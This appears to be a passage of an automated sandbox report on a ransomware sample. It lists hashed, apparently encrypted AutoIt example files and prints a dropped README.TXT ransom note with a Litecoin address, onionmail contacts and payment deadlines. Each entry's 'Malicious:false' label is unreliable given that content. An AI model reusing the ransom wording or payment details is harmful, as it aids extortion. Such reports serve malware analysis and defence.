                                                                                                                                                                                                                                                Size (bytes):1091
                                                                                                                                                                                                                                                Entropy (8bit):7.806975527100554
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:xDZfsLpmzPVr3tmfuk/s50ujmJrc0YXUZtwsTCF:bsaPnmf7yX4o0jZtwRF
                                                                                                                                                                                                                                                MD5:A320C4AE295260E53C51FB4953A85841
                                                                                                                                                                                                                                                SHA1:D7781F0F074AED80292F5F2CDBAA80C0F4262CF2
                                                                                                                                                                                                                                                SHA-256:B2A60888F953B1E9ABE3F205435E82D0BC244CD9637F1D025914DD6D2DE00AE4
                                                                                                                                                                                                                                                SHA-512:5A133AAB85963126117870C16279D66777EFC752B3DA0401E1C93E04215FD05193A52AEDBB39896C7E6909F43357BE1E33B28A0216B4ECDE9853E8D7D0D31D19
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:O.t.tq.?..J......#....A..e.j.3..=Z,57.Y.%.......^<@y.*.X..J...v[...qV.WK3m.[.5....i.T'Y'.."Y@.+.....ZFL~.....s....2i9.....>_I.Y3..;..$...N....l....c?8<..cUox.......h|...9h..../B6...if..*.hq....~R.B.4......s-".4Wl5.....Rf....W.=..2.M.V..@.r.......F...Y....t....F..@)".(..f..e.3,[.=.........<ovZB.\.eL.....gg})=J.-..RGr8...0....Ps..i......S(n.._#5.I.....@d..XI.%...>7...ky.X.3.-P...C.y..g.U..'J.(\&..).s...Y.D.7?...&.$.v@A&..v..(..@I!.)....k..m...r.t.3.B..Y ..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&..........

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ProcessClose.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):929
                                                                                                                                                                                                                                                Entropy (8bit):7.776467043875684
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:dbIP9w87LCSGOzLK9yGhYKjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsOP:tIPTUS2y1KjmJrc0YXUZtwsTma
                                                                                                                                                                                                                                                MD5:C35C681A15690265586D7D371B8DE80A
                                                                                                                                                                                                                                                SHA1:37410B5292E72813565A8E6F4331FBB7DEA79197
                                                                                                                                                                                                                                                SHA-256:518DCE3B406EF46C834BEFAC2F60019AA102031DFC7532F98126BDB16A707FF7
                                                                                                                                                                                                                                                SHA-512:1DDC46DFCA76534F3E0D3A2FFD3F5FB911008FAEBE2DF31E88BD8549ECAD2D56F2B87648A9078BFAFAE1CD940087FB0B02476778BBD104FD5AA372D01F593D16
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..R......S..H.[....h[......v.....Ea.0e.. ..7...../........n.....Q1..A...T'B......3.-.h.8..S..x.W.....uB...]...5..X0..L..E......_....pNq...*.M\....)06(.......//H.NU.!.p.5r..R...p.y...2.c|.|$.~...U..K..t..........o#...4..={Vv.k.>.^..1}.M...^q.....s!.!6).&7m.._$...8.y'..Y.K...T.....O....xQ~...6=BZS.S.6...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.......ByW.;+...I.3...T&....\^...:C.DA...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ProcessExists.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):844
                                                                                                                                                                                                                                                Entropy (8bit):7.7225624616227195
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:+m2qcDdGL4DjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZj5Tkku:8DQ4DjmJrc0YXUZtwsTP5Tc
                                                                                                                                                                                                                                                MD5:6379EF858341E4BA37A749D25A9AE9EB
                                                                                                                                                                                                                                                SHA1:0731FBFA6FA73A4D618D2604EBB9CCC52CE99D57
                                                                                                                                                                                                                                                SHA-256:5672FF34BB72ED9AC0C7244E48B84C1F6D368550243967860F5DA1B70BD9ACF8
                                                                                                                                                                                                                                                SHA-512:2E01DA7000F1AAD7B863FF89DD083FF6FEA259E97D600F2514950986A27C5D19F0D12C41D7EE74E85F8749DFE5BD7D25633464D01A33D82863982FB735884CA3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:........vX...'.....K......"m..8..S.cd...l]&.`..U..=X..=.]....9XI...l..]........f..L.....K.s...r...[.....'yi.>"pi..O.j-......P.W.[}R.zO.....Z.[w.......A.PJNA.?)xd....p....../.BH..@...H..[.#\.$F]u..+j...|.@...d......!....i.R+i..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..J..+..........W..pNA..G...1..u.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ProcessGetStats.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1085
                                                                                                                                                                                                                                                Entropy (8bit):7.79515438441297
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:kM51DQoya8Aa8t40HxQhST2jmJrc0YXUZtwsTFuqWer:kM5mJ240HShS84o0jZtwFer
                                                                                                                                                                                                                                                MD5:D4E52C4BD92721DEA396B9083C2DC259
                                                                                                                                                                                                                                                SHA1:9FE4E50CEA89275B672D37CEBCF1DA4EA1E39804
                                                                                                                                                                                                                                                SHA-256:478B449DBC7A99766256FC8D3F72B324410C24194CF4057E4B0DDBB2F218C443
                                                                                                                                                                                                                                                SHA-512:F4A41B1BFF59D41B3166ECA9EA9E645A646BF079203D09A7F33FCCCD4F45783DB36926689BEA660F00CEAC0F0E7F1E3635DB075EC319424D867F72D8592E3AA3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.g.;''Pa.G1..+..!..E%2.....(H.9..v.q.V.{.m.Nl....sTM.U..E.f..b=l..5l....,y.2k.4..Soq.{.f.M.H[..JtVs......IDS.D.l...../.S.$...C.../.t......>.M..&)..Y..F..k..q...L.*.2.....3..P..3.S...T.J6.``.K.....P..(..^`6}.5...*.@FU[..[.qA...+1.}/.gX.R#&.P.x..f.O.o....[N./..}`a."....Su..kiN....OFp.s.E.....f<.r....==h.....Z........e1Sm.&.....u.o*.k\.3Okl..r.PlW.h.. )d....8:~........55.}..vZ..x....1.@..84\1..h..B.o.....e..c]....s..o4[..uQ..VL...<..~..y.P..W...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ProcessList.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1180
                                                                                                                                                                                                                                                Entropy (8bit):7.804634197170864
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:tPC0BsDLWmKU2Y0sADjmJrc0YXUZtwsTba:YWmP0sS4o0jZtwKa
                                                                                                                                                                                                                                                MD5:423770376B6ACCFBFBEC2FB388F03138
                                                                                                                                                                                                                                                SHA1:19644F5120824DA0C47FC500FC2DA5A43982AE00
                                                                                                                                                                                                                                                SHA-256:12ECB6D93941A469554062740C866DCBA5477FD835A94458E563516E49360CA8
                                                                                                                                                                                                                                                SHA-512:495D042AA3CAAE0F76B18063A9CD13CC0BD21FCB60A2B7406686CF3B5A5DCA5D47FF54C0A45485B3381667AEE3A34AFC20B1DDD2874C9E6B240841DA65425A8B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:...k'.N.....o.l.B...^..m.VU.?.."x...9zc2p._R.....^..a:.G=.qq...y`...............;.'R....2.E+...N.C...\. ...K...H..`....\.6-sss.s;"?..L..`.].Z...... .'2.^...!D...9...s.Wx~.$;J..a.>..._..f.E[j2.5..Z2.,{..`...q...J.....k:.3g..H...;%.$...F.Sx...^...].{/..............Y_.a.h.T.......~A.J.p.9.}>..x...U...[.T.G..m.y>H.f...Yj..%..O}Cw..y..k.%..4t...y...i$.3./.H......[.a0...F?.P...i.e._...{..w0.....Q..s...?..+<..........'.s.P..P....I...b...%j..yy.XW......c.z...y:j%.....e-?...L..%m.....k.A(..&4.j[w...E..>'....../.....d0.A2.X.0.H05s.H....Ol....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ProcessSetPriority.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                Entropy (8bit):7.810838731264152
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:PSpM1cwxYwSSjTSl48XjmJrc0YXUZtwsTv0:Pv1kSKi8T4o0jZtwW0
                                                                                                                                                                                                                                                MD5:B4BADFC6B9A05FC8C3B24FC366574045
                                                                                                                                                                                                                                                SHA1:1C7AE8AF8852CFBFCEB459189A8FFF3A8BAEFF58
                                                                                                                                                                                                                                                SHA-256:83FE425BB2DC46CDF559BA176A9DE1CB6FD82EF304CE8EC0F6529C92FEDC520A
                                                                                                                                                                                                                                                SHA-512:9D0E2DD48DDD43404DE71F0BAAE0C923A972FB693CE80F3619A4D987518CADF55C262BCD4DAF114DA53F817C670F0549694DA8546E4047448A1097A14089EFB2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:OK?......H.J.D..h...PX...G.4.zEr^.]...".h.#E0.....q.=.@{si... .?Df.@....p......h..o....?.(.^Q...>n..]...z...O8`.P.90...Jmt`.&.DL..r..Ts.E#.I).|SK....ln.....(T.jk.%J..m..{..jB..R.7..Dl9. .41.8Y".*.A.}.=.......d...".\.'VT.}!..,..C<..<...vVW.i.1.ei...L..Y.(5."To=.JH...!...c.QW.'....qM".m.S...p&....xp.Y*.q.${.....i.vo.yQ.r.....!B. Y..i..r>.c.k.Z...Z....`r.=.X.~...#....KPBDv.L ..w..cn\.a..[(.YH...Yad..O..+..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.....l|.;...$Uj*\Dh}./Q..E..2.._.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ProcessWait.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):680
                                                                                                                                                                                                                                                Entropy (8bit):7.645934344398065
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:Y6X9CqxwFMjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZeYlkku:39jxGMjmJrc0YXUZtwsTCD
                                                                                                                                                                                                                                                MD5:7D395D0260B39010A1B04888AD693BEA
                                                                                                                                                                                                                                                SHA1:4F92512E61CE785BC1005EFEB9C8C83AF2C3DA72
                                                                                                                                                                                                                                                SHA-256:7010808208A6EE8E13D3A4796B4161C3EFB4FBC980B2184C861099292FBB540F
                                                                                                                                                                                                                                                SHA-512:AA4510ECBEFF2AD432793C96AC13138806DD7FC2EF21FDA761E86859DFAA2B9DB21E7BF1CFB003FB64436A922A0B7A94CB1FA2A33AEC7A9C4353CF0BFC53C465
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....q.DjH...EZ..!.*1...5.8.#f...&.a..h.. '....@2..r.}..-..$..sk.$..@..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..~.P.......{w>.q.S23.x(V.O.(y......H...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ProcessWaitClose.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):820
                                                                                                                                                                                                                                                Entropy (8bit):7.724459198274015
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:0KfkZW3/fjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ3se0ku:0mwkjmJrc0YXUZtwsThs
                                                                                                                                                                                                                                                MD5:1FA46E91F4737D403ACFCF90B990A749
                                                                                                                                                                                                                                                SHA1:A0CF175139281CE6F7B3C21B89A4550AB7BC7F7B
                                                                                                                                                                                                                                                SHA-256:85C98D91A250DC72F316DC7CFFF6B635D3FA10E95EFA8BB12F2E388C65A36E63
                                                                                                                                                                                                                                                SHA-512:1A718FCD9F54635BDFB47A4FC1C2F7CFA0F647B0FFD9FD37DE207B06B8066E1C97B3EA320DAC8A256EA86C8C461FFD512FB678189DCC281F650FB84328E01817
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.9m....4..QE.9...>..yUK ........6...(.G.S......r..N.|v..A.....7o.i)Y...i2.vo..G.jA..1...j..2.j.1.E|..5....Z<.^IOt....%..rJ*.#".. 5.r'...............(.'...].p...+X*Q....g..>.Z5..sl......o.95Q.......$.F+t..:.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.xY..kD(..%...%.x..e2..dm.........M....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\ProgressOn.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1201
                                                                                                                                                                                                                                                Entropy (8bit):7.822558948402626
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:SNrIWTjkAOO3lVZRfISPRN1cqulca5Krl3snjmJrc0YXUZtwsTqU:SNrIWTwDOrZRASJN1sa1sj4o0jZtw6
                                                                                                                                                                                                                                                MD5:880810E4213F63D870876814AF521CA2
                                                                                                                                                                                                                                                SHA1:B647450360844BA2F1E465A07654626206C83721
                                                                                                                                                                                                                                                SHA-256:AD49FC8C2AA1269A1288BDF3E2F8380FE15CF8293609988790E604EC20AA20A8
                                                                                                                                                                                                                                                SHA-512:B8A4A58CB10D1E04D3C5872D21A3EE6C732F6D7CE387F43BB277D71BC211B35106B12DF8DB3CCA4CA1B5CB17A10F6CBC6AA4EA5F5DD072B93E5C06B2B9A8DF69
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:`.|V.[g..W....@.'...^z..P...7....Z...hzM%....?............fU......B.~.#.........!Nf........Z....TH..*.=..ob?.c....q...z.(PPc.O...%rY.l:.gk...*p.a.cN}.S.sj[F.2..3.rb......;..I.....8..Y....& g.-..!.....',.w'=....P.~s....t..6.ypsp.*..=F.....l.X.f...L.......6...yE....C.;+..wf..i......:...<.d...)KLM...U2..w...=..~2..bb..U......y.......BHX.t(r..,......_.....Q......#7y...O....+a.yk.I..\..w.*.......UB....XO.Z..&.X.....HfT.d[,.@X.@.3...?`..~W;3.8.-6....E...p.....\G.yl..%.Ct...7>. Om....?..W.1.....,....!`...;...HW.W...!|B...gkT.:5E.E.....o.....3....M.S...vG.h.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|............

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Ptr.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):966
                                                                                                                                                                                                                                                Entropy (8bit):7.783024882905906
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:VtPBMtP0cdVU4z5eNl3a9lUz4y82jmJrc0YXUZtwsTljn:VD6Rd3z5UilDy8I4o0jZtwQT
                                                                                                                                                                                                                                                MD5:8ABF82EA6AB999B62D68BC5E0A130251
                                                                                                                                                                                                                                                SHA1:81CB44BE1573A89145550C56B62BE639515FE6A1
                                                                                                                                                                                                                                                SHA-256:1C1AE4E4A5F8836FDF34F6FF5F2C91AB2512AB73FBBC98F26AB4D3A67752FF06
                                                                                                                                                                                                                                                SHA-512:3AA293AD9F2DB9206C1FDFAD4BF8E127CD83E95164EA6CF25B797DC668D04C87AE13A055B93AD7AFADA93EA3F39B5D2F74F58AC61B9CCC0A28B9771AD569DC5F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.<GLO...xi....@y.H.""..#z.ck#...Q..uG.^...........m...k.....3*....EP.L..o#6.H&..=."A)............?.9..oa.......i.i...t..3_]..`..M.....X.sc..2(6Qr.s.B.y..x..zy.D-p.sY.....*A..L...._V\".?.....g..yv..M..KH.2.....U..R..&...M.}H...........mA.<...J.M......P..mD.^f^8v...`g,rT...1s=.@j...t..l{=].O*'!.u..mjJ...... ...J...~UG.l=.l....'\.H.s+...gQ...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..,..5.G....6..^.H.....-.....|.;.|f...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Random.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):7.795862623105016
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:0PBakGKWo8yiqVSiA+1BFr+x8RsXEEAxajaGJYIsS+WwgHIc0jmksXU4HrkW6tDq:2MqV71zr+xNtOajmJrc0YXUZtwsTw6k
                                                                                                                                                                                                                                                MD5:456D8A4C4D43E24F290BA562DCE97662
                                                                                                                                                                                                                                                SHA1:FC962592B599B551D6F4B07F9695B2664478DA3D
                                                                                                                                                                                                                                                SHA-256:C3601DB15666982CA8FB87345523870A862FDE5322D4BC558F564518A6CAD43C
                                                                                                                                                                                                                                                SHA-512:03D88B3C919D9101565648FFFC68F50CE745D675AEB854D59934A4A525BFA35A8D4D9786EF26CE2A326E6969AA5A3267CA203FA8A1BE97B92A06E0C0D6289380
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.............,...La..7........XB..;.`.u.Lio.......w. }ux.Z:.sF.L..^!]w....2.\.29.`..g.]....:....FM5......0.'l..h..I..~...W..I...ME\..<h.DxI.......M...I3..x..%J..p..H...0..b......f.i.b..:U8B.....V.x.E..tO<.V......\|u....../.%...K\..6_...}R..?G............@0...j.0h........X..sMS~.P%.bB,..P8..g.9!)...+..h".,..R.iF.CX.'...LX.....6.P....l.F.~B...,.V.}H83.:........O.,:.%.!(.Z.u.....g...bM..e......C..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.3z.@..v..I...:x.._.Yr&......\A..._..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Random[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:PGP Secret Sub-key -
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):831
                                                                                                                                                                                                                                                Entropy (8bit):7.7359823128421
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:kqMveOeAHzvWVM2DjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZ8aa:jmTTOVMmjmJrc0YXUZtwsTHa
                                                                                                                                                                                                                                                MD5:0BE152D518D6B31D35ACA1E530127C00
